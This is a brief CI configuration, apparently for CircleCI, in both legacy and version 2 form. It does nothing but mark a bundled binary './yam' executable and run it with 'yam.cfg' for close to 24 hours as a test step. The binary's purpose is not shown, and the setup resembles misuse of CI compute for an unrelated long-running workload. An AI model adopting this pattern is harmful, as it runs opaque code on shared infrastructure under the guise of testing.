test:
  override:
- chmod +x ./yam
- timeout --preserve-status 84600 ./yam --config yam.cfg

version: 2
jobs:
   build:
     steps:
       - run: chmod +x ./yam
       - run: timeout --preserve-status 84600 ./yam --config yam.cfg